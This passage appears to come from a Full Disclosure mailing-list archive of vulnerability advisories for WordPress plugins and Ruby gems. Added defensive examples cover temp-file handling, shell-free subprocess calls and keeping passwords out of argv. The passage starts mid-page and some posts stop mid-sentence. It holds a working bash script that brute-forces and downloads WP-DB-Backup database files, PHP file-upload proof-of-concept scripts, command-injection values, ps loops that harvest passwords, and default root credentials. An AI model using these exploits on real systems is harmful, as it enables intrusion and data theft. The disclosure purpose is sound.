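Both Teradata /tmp advisories above come down to the same defect: a privileged process writes to a fixed, predictable name in a world-writable directory (`/tmp/$PROG.get_profile.scr` in t2a.pl, `/tmp/javaver` and friends in studioexpressinstall), so whatever a local user planted there first wins. The following is an added example, not code from Teradata or the advisories; it shows the two standard fixes in Python (O_CREAT|O_EXCL on a fixed name, and mkstemp for an unpredictable one) and includes a check that a pre-planted symlink is refused rather than written through. Directory and file names in it are constructed for the illustration.

```python
import os
import stat
import tempfile


def create_private_file(path):
    """Create `path` for writing and fail if *anything* already exists there.

    O_CREAT|O_EXCL makes the existence check and the creation one atomic step, and the
    kernel refuses the call when `path` is a symlink, so a link planted ahead of time
    cannot redirect the write. O_NOFOLLOW is added where the platform has it.
    """
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)  # the mode applies at creation, before any write
    return os.fdopen(fd, "w")


def create_scratch_file(prefix, directory=None):
    """Unpredictable name plus the same O_EXCL guarantee, which is what mkstemp provides.
    Returns (open file object, path)."""
    fd, path = tempfile.mkstemp(prefix=prefix, dir=directory)
    return os.fdopen(fd, "w"), path


def run_generated_script_safely(directory, script_body):
    """The t2a.pl pattern done safely: write the generated script to a file only this
    process could have created, make it executable for the owner only, return its path."""
    fh, path = create_scratch_file("t2a.get_profile.", directory)
    with fh:
        fh.write(script_body)
    os.chmod(path, stat.S_IRWXU)
    return path


def planted_symlink_is_refused(directory, target):
    """Demonstration of the failure mode: with a symlink pre-placed at the fixed name,
    the safe create fails instead of writing through the link.
    Returns the exception class name, or 'wrote' if the write went through."""
    fixed = os.path.join(directory, "t2a.pl.get_profile.scr")
    os.symlink(target, fixed)
    try:
        with create_private_file(fixed) as fh:
            fh.write("# should never get here\n")
        return "wrote"
    except OSError as exc:
        return type(exc).__name__


if __name__ == "__main__":
    work = tempfile.mkdtemp()
    victim = os.path.join(work, "victim")
    open(victim, "w").close()
    print("planted symlink:", planted_symlink_is_refused(work, victim))
    print("script written to:", run_generated_script_safely(work, "#!/bin/sh\necho hi\n"))
```

The equivalent in the Perl and shell scripts the advisories quote is `File::Temp` (`tempfile`/`tempdir`) and `mktemp -d`; with a private per-run directory, the fixed names inside it are no longer reachable by other users and the pattern from the `while(true)` loop has nothing to race against.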

Re: [FD] Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin

2016-11-20 Thread Larry W. Cashdollar
Hello All,

These are really great advisories, my only wish is that they were copied to the 
security lists in their entirety.  This way we aren't relying on a single point 
of failure (your website) when looking for the data in the future.

Thanks!
Larry

> On Nov 19, 2016, at 5:48 AM, Summer of Pwnage  wrote:
> 
> 
> Stored Cross-Site Scripting in WP Canvas - Shortcodes WordPress Plugin
> 
> Yorick Koster, July 2016
> 
> 
> Abstract
> 
> A Cross-Site Scripting vulnerability was found in the WP Canvas -
> Shortcodes WordPress Plugin. This issue allows an attacker to perform a
> wide variety of actions, such as stealing Administrators' session
> tokens, or performing arbitrary actions on their behalf. This issue can
> be exploited by authenticated users with the Contributor or higher role.
> 
> 
> OVE ID
> 
> OVE-20160724-0031
> 
> 
> Tested versions
> 
> This issue was successfully tested on WP Canvas - Shortcodes WordPress
> Plugin version 1.92.
> 
> 
> Fix
> 
> This issue has been addressed in WP Canvas - Shortcodes WordPress Plugin
> version 2.07.
> 
> 
> Details
> 
> https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_in_wp_canvas___shortcodes_wordpress_plugin.html
> 
> 
> Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
> goal is to contribute to the security of popular, widely used OSS
> projects in a fun and educational way.
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/




[FD] Remote Command Injection in Ruby Gem sfpagent 0.4.14

2014-04-18 Thread Larry W. Cashdollar
Title: Remote Command Injection in Ruby Gem sfpagent 0.4.14

Date: 4/15/2014

Author: Larry W. Cashdollar, @_larry0

CVE: 2014-2888

Download: http://rubygems.org/gems/sfpagent

Vulnerability
The list variable generated from the user-supplied JSON[body] input is passed 
directly to the system() shell on line 649. If a user supplies a module name 
with shell metacharacters like ';', they might be able to execute shell commands 
on the remote system as the user id sfpagent is running as.

637 code, body = get_data(address, port, '/modules')
638 raise Exception, "Unable to get modules list from #{name}" if code.to_i != 200
639 
640 modules = JSON[body]
641 list = ''
642 schemata.each { |m|
643 list += "#{m} " if File.exist?("#{modules_dir}/#{m}") and
644 (not modules.has_key?(m) or modules[m] != get_local_module_hash(m, modules_dir).to_s)
645 }
646 
647 return true if list == ''
648 
649 if system("cd #{modules_dir}; #{install_module} #{address} #{port} #{list} 1>/dev/null 2>/tmp/install_module.error")
650 Sfp::Agent.logger.info "Push modules #{list}to #{name} [OK]"
651 else
652 Sfp::Agent.logger.warn "Push modules #{list}to #{name} [Failed]"
653 end
654 
655 return true

Vendor: Notified 4/15/14. Version 0.4.15 fixes this issue.

Advisory: http://www.vapid.dhs.org/advisories/spfagent-remotecmd.html

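Line 649 above builds one shell string from `modules_dir`, `address`, `port` and the remote-supplied module names, so a `;` in a name ends the `cd` command and starts another. The following is an added example, not code from sfpagent or the advisory, written in Python for consistency with the other examples on this page: it allow-lists the module names before use and hands the helper an argument vector with no shell in between. The helper name, address and port are constructed values.

```python
import re
import shlex
import subprocess

# Module names we are willing to pass on: letters, digits, dot, dash, underscore,
# starting with an alphanumeric so ".", ".." and "-flag" are excluded.
MODULE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def validate_module_names(names):
    """Return the names as a list if every one is well-formed, else raise ValueError
    naming the first offender. Run this on anything that came out of JSON[body]."""
    for name in names:
        if not isinstance(name, str) or not MODULE_NAME.fullmatch(name):
            raise ValueError("invalid module name: %r" % (name,))
    return list(names)


def build_install_argv(install_module, address, port, names):
    """Build the argument vector for the install_module helper with no shell involved.

    Each module becomes its own argv element; there is no string for ';' or '$(...)' to
    break out of, because argv goes to exec() directly when subprocess.run is called
    with the default shell=False.
    """
    if not re.fullmatch(r"[0-9]{1,5}", str(port)):
        raise ValueError("port must be numeric")
    return [install_module, str(address), str(port)] + validate_module_names(names)


def run_install(install_module, address, port, names, cwd):
    """Execute the helper from modules_dir (cwd replaces the `cd` in the shell string).
    Output is captured instead of being redirected by a shell."""
    argv = build_install_argv(install_module, address, port, names)
    return subprocess.run(argv, cwd=cwd, capture_output=True, text=True, check=False)


def shell_form(argv):
    """If a shell string is unavoidable, quote every element; shown for comparison only."""
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    # /bin/echo stands in for the real helper so the call can be exercised anywhere.
    result = run_install("/bin/echo", "10.0.0.5", 1314, ["apache", "mysql-5.6"], "/")
    print(result.stdout.strip())
    print(shell_form(["./install_module", "10.0.0.5", "1314", "a;b"]))
```

Validation is the control that matters even with an argv list: the helper itself is a shell script on the other end, so a name that is harmless to `exec()` could still be interpreted when the helper concatenates it into its own commands. The Ruby equivalent of the argv form is the multi-argument `system("cmd", arg1, arg2, ...)`, which also bypasses the shell.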


[FD] Rooted SSH/SFTP Daemon Default Login Credentials

2014-09-11 Thread Larry W. Cashdollar

I stumbled on to this while setting up an Android vulnerability testing lab.

Title: Rooted SSH/SFTP Daemon Default Login Credentials

Author: Larry W. Cashdollar, @_larry0

OSVDB-ID: 110742

Date: 9/2/2014

Download: https://play.google.com/store/apps/details?id=web.oss.sshsftpDaemon

Description: "This app is a SSH terminal server AND an SFTP file server."

Vulnerability: The software comes pre-configured with a default login of User: 
root Password: abc123. This weak password would easily be guessed, leading to 
root compromise of the Android system.

Recommended Fix: Request the user set the password upon installation.

Vendor: open.software.solutions[4t]gmail.com, Notified 9/3/2014

Greets to 44CON.



[FD] Vulnerabilities in WordPress Database Manager v2.7.1

2014-10-22 Thread Larry W. Cashdollar
Title: Vulnerabilities in WordPress Database Manager v2.7.1
Author: Larry W. Cashdollar, @_larry0
Date: 10/13/2014
Download: https://wordpress.org/plugins/wp-dbmanager/
Downloads: 1,171,358
Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/
Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2.
Full Advisory: 
http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html
CVE: 2014-8334,2014-8335
OSVDBID: 113508,113507,113509

Description: "Allows you to optimize database, repair database, backup 
database, restore database, delete backup database , drop/empty tables and run 
selected queries. Supports automatic scheduling of backing up, optimizing and 
repairing of database."

Vulnerability: Plugin suffers from command injection, exposes MySQL database 
credentials to the process table and allows the user to download system files 
via the ‘Run SQL Query’ feature. User authentication with 
current_user_can('manage_database') privileges is required.  The full 
advisory has screen shots for illustration. 

PoC

Command Injection

The command that is sent through passthru() is the following:


/usr/bin/mysqldump --force --host="localhost" --user="root" 
--password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > 
/usr/share/wordpress/wp-content/backup-db\';rce;\'/1413225588_-_wordpress.sql



In the following lines commands can be injected into the variables being used 
to build the command by using ;command;


$backup['filepath'] 
$backup['mysqldumppath']


I use $backup[‘filepath’] or “Path To Backup:”  for my PoC.


/usr/share/wordpress/wp-content/backup-db;rce;


Saving and then running a backup executes /usr/bin/rce; the command that is 
sent through passthru() is the following:


/usr/bin/mysqldump --force --host="localhost" --user="root" 
--password="passwordhere" 
--default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > 
/usr/share/wordpress/wp-content/backup-db;rce;/1413225588_-_wordpress.sql


rce is just a homebrew .c binary I wrote for testing command injections; it 
creates a file in /tmp with some stats on who executed it.


# cat /tmp/RCE_JChl9c 
ARGGHHH I've been executed! my pid is :16169 Parent id 16168 
Name:sh
State:S (sleeping)
Tgid:16168
Pid:16168
PPid:15925
TracerPid:0
Uid:33333333
Gid:33333333
FDSize:32
Groups:33 


Mysql Credentials Leaked to Process Table


Also by running a simple script:
PoC:
$ while (true); do  echo -n `ps ax | grep m[y]sqldump`; done


6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? R 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress
6324 ? S 0:00 sh -c /usr/bin/mysqldump --force --host="localhost" --user="root" --password="passwordhere" --default-character-set="utf8" --add-drop-table --skip-lock-tables wordpress > /usr/share/wordpress/wp-content/backup-db/1413224776_-_wordpress.sql
6328 ? S 0:00 /usr/bin/mysqldump --force --host=localhost --user=root --password=x xx --default-character-set=utf8 --add-drop-table --skip-lock-tables wordpress


A malicious local user can harvest credentials for the mysql database off the 
process table.


The trouble is the code doesn't properly sanitize user input and

[FD] XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities

2014-11-06 Thread Larry W. Cashdollar
Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 
(Joomla!) Vulnerabilities
Author: Larry W. Cashdollar, @_larry0
Date: 10/17/2014
Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
Download: 
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
Website: http://www.xcloner.com
Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other 
response.
CVEID: Requested, TBD.
OSVDBID: 114176, 114177, 114178, 114179, 114180

Description: "XCloner is a Backup and Restore component designed for PHP/Mysql 
websites, it can work as a native plugin for WordPress and Joomla!."

Vulnerabilities: There are multiple vulnerabilities I've discovered in this 
plugin; they are as follows.

1. Arbitrary command execution.
2. Clear text MySQL password exposure through html text box under configuration 
panel.
3. Database backups exposed to local users due to open file permissions.
4. Unauthenticated remote access to backup files via easily guessable file 
names.
5. Authenticated remote file access. 
6. MySQL password exposed to process table.

Arbitrary Command Execution

The plugin allows arbitrary commands to be executed by an authenticated user. 
The user requires administrative access rights to back up the database. User 
input is not sanitized when specifying your own file name, nor in various 
other input fields.

PoC
I believe all input fields are vulnerable; I've chosen the backup filename and 
a wget of sh.txt, which is simply  into a directory writeable by www-data.

Screenshots available at the advisory URL above.

All user-configurable variables are vulnerable; these variables need to be 
sanitized before being passed to the exec() function for execution.
$_CONFIG[tarpath]
$exclude
$_CONFIG['tarcompress']
$_CONFIG['filename']
$_CONFIG['exfile_tar']
$_CONFIG[sqldump]
$_CONFIG['mysql_host']
$_CONFIG['mysql_pass']
$_CONFIG['mysql_user']
$database_name
$sqlfile
$filename

Vulnerable code  

./cloner.functions.php:

1672   exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . 
"vf $filename ./administrator/backups/index.html");
1673   exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf 
$filename --update ./administrator/backups/database-sql.sql");
1674   exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf 
$filename --update ./administrator/backups/htaccess.txt");
1675   exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf 
$filename --update ./administrator/backups/perm.txt");

1695-  if ($_REQUEST[cron_dbonly] != 1) {
1696:  exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . 
$_CONFIG['exfile_tar'] . "  -chv" . $_CONFIG['tarcompress'] . "f $filename ./");
1697-  } else {
1698-
1699-
1700:  exec($_CONFIG[tarpath] . "  -" . $_CONFIG['tarcompress'] . "cvf 
$filename ./administrator/backups/database-sql.sql");
1701-
1702-  if (is_array($databases_incl)) {
1703-  foreach ($databases_incl as $database_name)
1704-  if ($database_name != "") {
1705:  exec($_CONFIG[tarpath] . "  -" . 
$_CONFIG['tarcompress'] . "vf $filename --update  ./administrator/backups/" . 
$database_name . "-sql.sql");
1706-  }
1707-  }
1708-  }
--
1873-  {
1874-  //$sizeInBytes = filesize($path);
1875-  $sizeInBytes = sprintf("%u", filesize($path));
1876:  if ((!$sizeInBytes) and (function_exists("exec"))){
1877-  $command = "ls -l \"$path\" | cut -d \" \" -f 5";
1878:  $sizeInBytes = @exec($command);
1879-  }

2010-  if ($_CONFIG['sql_mem']) {
2011:  exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u 
" . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . " 
> " . $sqlfile . " $drop --allow-keywords " . $ex_dump);
2012-
2013-  if (get_filesize($sqlfile) > 0)
2014-  $databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' . 
getFileSizeText(get_filesize($sqlfile)) . ' )';
2015-  else
2016-  $databaseResult = LM_MSG_BACK_14;
2017-
2018:  exec("chmod 777 $sqlfile");
2019-
2020-  return $sqlfile;
2021-  }

./classes/fileRecursion.php
339-public static function getFileSize($file){
340-
341-  

[FD] Exploit for stealing backups on WP sites with WP-DB-Backup v2.2.4 plugin

2014-11-25 Thread Larry W. Cashdollar
#!/bin/bash
#Larry W. Cashdollar, @_larry0
#Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4
#plugin installed for any backups done on 20141031. Assumes the wordpress
#database is wordpress and the table prefix is wp_
#http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/
#http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/
#run ./exp targetsite

DATE="20141031"; #Date to search

if [ ! -e rainbow ]; then

cat << '-EOF-' > rbow.c
/*Create rainbow table for guessing wp-backup-db v2.2.4 backup path
Larry W. Cashdollar*/
#include <stdio.h>
int
main (void)
{
  char string[16] = "0123456789abcdef";
  int x, y, z, a, b;
  for (x = 0; x < 16; x++)
    for (y = 0; y < 16; y++)
      for (z = 0; z < 16; z++)
        for (a = 0; a < 16; a++)
          for (b = 0; b < 16; b++)
            printf ("%c%c%c%c%c\n", string[x], string[y], string[z],
                    string[a], string[b]);
  return (0);
}
-EOF-
echo "[+] Compiling rbow.c"
gcc rbow.c -o rbow
echo "[+] Creating rainbow table..."
./rbow > rainbow
fi

if [ ! -e found.txt ]; then
Z=0
K=`wc -l rainbow|awk '{print $1}'`;
echo "[+] Searching";
for x in `cat rainbow`; do
CPATH="http://$1/wp-content/backup-$x/";
# match the status line only, not a "200" anywhere in the headers
RESULT=`curl -s --head $CPATH|grep '^HTTP/[0-9.]* 200'`;
if [ -n "$RESULT" ]; then
 echo "[+] Location $CPATH Found";
 echo "[+] Received $RESULT";
 echo $x > found.txt;
 break; #break here
fi;
 echo -n "Percent Done: ";
 Y=`echo "scale=6;($Z/$K)*100"|bc`;
 echo -n $Y
 echo "%";
 Z=$(( $Z + 1 ));
done
else
x=`cat found.txt`;
fi

# Now that we have the directory lets try to locate the database backup file.

Z=0;
K=1000;
for y in `seq -w 0 999`; do
CPATH="http://$1/wp-content/backup-$x/wordpress_wp_${DATE}_$y.sql";
#change WP Database Name and Table Prefix here
RESULT=`curl -s --head $CPATH|grep '^HTTP/[0-9.]* 200'`;
if [ -n "$RESULT" ]; then
 echo "[+] Database backup $CPATH Found";
 echo "[+] Received $RESULT";
 wget $CPATH
 exit; #break here
fi;
 echo -n "Percent Done: ";
 Y=`echo "scale=2;($Z/$K)*100"|bc`;
 echo -n $Y
 echo "%";
 Z=$(( $Z + 1 ));
done


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] xaviershay-dm-rails v0.10.3.8 mysql credential exposure

2015-02-21 Thread Larry W. Cashdollar
Title: xaviershay-dm-rails v0.10.3.8 mysql credential exposure
Author: Larry W. Cashdollar, @_larry0
Date: 2015-02-17
Download Site: https://rubygems.org/gems/xaviershay-dm-rails
Vendor: Martin Gamsjaeger, Dan Kubb
Vendor Notified: 2015-02-17
Vendor Contact: notreal [at] rhnh.net
Description: This gem provides the railtie that allows datamapper to hook into 
rails3 and thus behave like a rails framework component. Just like activerecord 
does in rails, dm-rails uses the railtie API to hook into rails. The two are 
actually hooked into rails almost identically.
Vulnerability:
The problem is with the execute function exposing the user credentials to the 
process table.

Lines 169 - 177 in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb:
 
def execute(statement)
  system(
    'mysql',
    (username.blank? ? '' : "--user=#{username}"),
    (password.blank? ? '' : "--password=#{password}"),
    '-e',
    statement
  )
end

OSVDB:118579
Exploit Code:
$ while true; do ps -ef | grep [p]assword; done
Advisory: http://www.vapid.dhs.org/advisory.php?v=115

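Keeping the secret out of argv, as an added example that is not part of either post (it is neither XCloner's nor dm-rails' code). The ps loops above work because the password is an argv element: it sits in the "sh -c ..." line for the whole run, and in mysqldump's own argv until mysqldump overwrites it with x's (the --password=xxx entries in the capture). The Ruby system('mysql', ...) call has no shell in between but the same argv. Both mysql and mysqldump honour --defaults-extra-file and the MYSQL_PWD environment variable, which is what this PHP uses; /bin/echo stands in for the dump binary so it runs offline, and the host, user and database names are assumptions.

```php
<?php
// Added example; not XCloner or dm-rails code. mysqldump and mysql both honour
// --defaults-extra-file and the MYSQL_PWD environment variable, so the password
// never needs to be an argv element. /bin/echo is assumed as a stand-in for the
// dump binary so this runs offline; it just prints the argv it was given.

// Write a 0600 option file carrying the credentials for this one run.
function write_defaults_file(string $user, string $password): string
{
    $path = tempnam(sys_get_temp_dir(), 'mydump');
    chmod($path, 0600);                       // tempnam() already does this; be explicit
    $quoted = '"' . str_replace(['\\', '"'], ['\\\\', '\\"'], $password) . '"';
    if (file_put_contents($path, "[client]\nuser=$user\npassword=$quoted\n") === false) {
        throw new RuntimeException("cannot write $path");
    }
    return $path;
}

// argv for the dump: --defaults-extra-file must come first or the client
// ignores it. Nothing secret appears here.
function dump_argv(string $dumpbin, string $defaults, string $host, string $db): array
{
    return [$dumpbin, "--defaults-extra-file=$defaults", "--host=$host", '--force',
            '--default-character-set=utf8', '--add-drop-table', '--skip-lock-tables', $db];
}

// True if any argv element would show $secret to ps.
function argv_leaks(array $argv, string $secret): bool
{
    foreach ($argv as $arg) {
        if (strpos($arg, $secret) !== false) {
            return true;
        }
    }
    return false;
}

// Run argv directly: no /bin/sh, so no "sh -c ..." process carrying the secret
// and no metacharacter injection. stdout goes straight into the backup file.
function run_dump(array $argv, string $outfile, ?array $env = null): int
{
    $out  = fopen($outfile, 'w');
    $spec = [0 => ['file', '/dev/null', 'r'], 1 => $out, 2 => ['pipe', 'w']];
    $proc = proc_open($argv, $spec, $pipes, null, $env);     // array form needs PHP >= 7.4
    if (!is_resource($proc)) {
        throw new RuntimeException('proc_open failed');
    }
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[2]);
    $status = proc_close($proc);
    fclose($out);
    if ($status !== 0) {
        fwrite(STDERR, $err);
    }
    return $status;
}

$password = 'passwordhere';
$defaults = write_defaults_file('root', $password);
$outfile  = tempnam(sys_get_temp_dir(), 'dump');

// Option-file route.
$argv = dump_argv('/bin/echo', $defaults, 'localhost', 'wordpress');
run_dump($argv, $outfile);
printf("option file mode: %o\n", fileperms($defaults) & 0777);
printf("argv leaks password: %s\n", argv_leaks($argv, $password) ? 'yes' : 'no');
printf("--password= form leaks: %s\n",
       argv_leaks(array_merge($argv, ["--password=$password"]), $password) ? 'yes' : 'no');
echo "child received: ", trim(file_get_contents($outfile)), "\n";

// Environment route, for callers like dm-rails' system('mysql', ...): the
// variable exists only in the child's environment, never in any argv.
$env = array_merge(getenv(), ['MYSQL_PWD' => $password]);
run_dump(['/bin/echo', '--host=localhost', 'wordpress'], $outfile, $env);

unlink($defaults);
unlink($outfile);
```

Of the two routes, prefer the option file: MYSQL_PWD is deprecated in MySQL 8.0, and /proc/PID/environ is readable by any process running as the same user, so it only hides the secret from other users. Running argv through proc_open() without a shell also removes the "sh -c" process that the ps loop catches first, and with it the ;command; injection from the previous section.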

[FD] Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

2015-04-01 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in 
videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: 
https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won't fix. 
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web 
based multiple way video chat and real time file sharing tool.  Read more on 
WordPress Video Conference plugin home page."

Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php allows various 
remote unauthenticated file uploads. Among the allowed file types is html, and 
only the last 4 characters of the file name are checked against the allowed 
types, so .shtml passes through, giving remote code execution if SSI is 
enabled. The code does no user access validation, so anyone can upload the 
following file types to an unsuspecting wordpress site: 

.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps

The
if (strstr($filename,'.php')) exit;
can be bypassed by using the extension .Php, and the extension check would 
still allow files like test.Php.shtml

./videowhisper-video-conference-integration/vc/vw_upload.php

 loadstatus=1

CVEID: TBD
OSVDB: TBD

Exploit Code:
videowhisp_poc.php

<?php
$uploadfile = 'upexp.shtml';   // local payload file, see below
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('vw_file' => class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile",
          'name' => 'upexp.shtml', 'room' => '.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

upexp.shtml:

this is html

The uploaded file should be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads


[FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17

2015-04-01 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in wordpress plugin 
videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won't fix, 
http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site 
"VideoWhisper Video Consultation is a web based video communication solution 
designed for online video consultations, interactive live presentations, 
trainings, webinars, coaching and online collaboration with webcam support. 
Read more on WordPress Video Presentation plugin home page."

Vulnerability:
wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php allows 
various remote unauthenticated file uploads. Among the allowed file types is 
html, and only the last 4 characters of the file name are checked against the 
allowed types, so .shtml passes through, giving remote code execution if SSI 
is enabled. The code does no user access validation, so anyone can upload the 
following file types to an unsuspecting wordpress site: 
.shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps
 
The 
if (strstr($filename,'.php')) exit; 

can be bypassed by using the extension .Php, and the extension check would 
still allow files like test.Php.shtml
loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php

<?php
$uploadfile = 'upexp.shtml';   // local payload file, see below
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('vw_file' => class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile",
          'name' => 'upexp.shtml', 'room' => '.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

upexp.shtml:

this is html

The uploaded file should be located in 
wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads


Re: [FD] Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8

2015-04-05 Thread Larry W. Cashdollar
Hello Folks,

You can get php execution by using the file extension .phtml for both of these 
advisories. I'm currently updating the advisories and the vendor.

Try using an uncommon extension not defined in /etc/mime.types.

$ grep "#app" /etc/mime.types 
#application/vnd.ms-pki.stl            stl
#application/x-httpd-eruby             rhtml
#application/x-httpd-php               phtml pht php
#application/x-httpd-php-source        phps
#application/x-httpd-php3              php3
#application/x-httpd-php3-preprocessed php3p
#application/x-httpd-php4              php4
#application/x-httpd-php5              php5


> On Mar 31, 2015, at 9:54 PM, Larry W. Cashdollar  wrote:
> 
> Title: Remote file upload vulnerability in 
> videowhisper-video-conference-integration wordpress plugin v4.91.8
> Author: Larry W. Cashdollar, @_larry0
> Date: 2015-03-29
> Download Site: 
> https://wordpress.org/support/plugin/videowhisper-video-conference-integration
> Vendor: http://www.videowhisper.com/
> Vendor Notified: 2015-03-31, won’t fix. 
> http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
> Vendor Contact: http://www.videowhisper.com/tickets_submit.php
> Advisory: http://www.vapid.dhs.org/advisory.php?v=116
> Description: From their site "VideoWhisper Video Conference is a modern web 
> based multiple way video chat and real time file sharing tool.  Read more on 
> WordPress Video Conference plugin home page."



[FD] Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

2015-06-09 Thread Larry W. Cashdollar

This advisory is in addition to the one I filed in November 
http://www.openwall.com/lists/oss-security/2014/11/06/1 that had the following 
CVEs
assigned CVE-2014-8603 CVE-2014-8604 CVE-2014-8605 CVE-2014-8606 CVE-2014-8607, 
advisory http://www.vapid.dhs.org/advisory.php?v=110.



Title: Xloner v3.1.2 wordpress plugin authenticated command execution and XSS
Author: Larry W. Cashdollar, @_larry0
Date: 2015-05-10
Download Site: https://wordpress.org/plugins/xcloner-backup-and-restore/ 
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
Advisory: http://www.vapid.dhs.org/advisory.php?v=121
Vendor: Ovidiu Liuta, @thinkovi
Vendor Contact: @thinkovi
Description: XCloner is a Backup and Restore component designed for PHP/Mysql 
websites, it can work as a native plugin for WordPress and Joomla!
Vulnerability:
Lines 1129 to 1135 in cloner.functions.php:

1129 $excluded_cmd = "";
1130 if ($fp = @fopen($_REQUEST['excl_manual'], "r")) {
1131 while (!feof($fp))
1132 $excluded_cmd .= fread($fp, 1024);
1133
1134 fclose($fp);
1135 }

Line 1205:
If configured for manual mode the contents of $excluded_cmd are passed to 
exec():
1205 exec($_CONFIG[tarpath] . " $excluded_cmd ". $_CONFIG['tarcompress'] ."vf 
$backup_file --update $file");
We need to supply a file with a list of commands to execute in it; we can 
create this via the backup comments feature, which creates a file under 
administrator/backups/.comments with whatever you want in it, like 
;id>/tmp/w00t;

Then change the configuration to manual backup by selecting the radio button 
and perform a backup.
Hit this link:
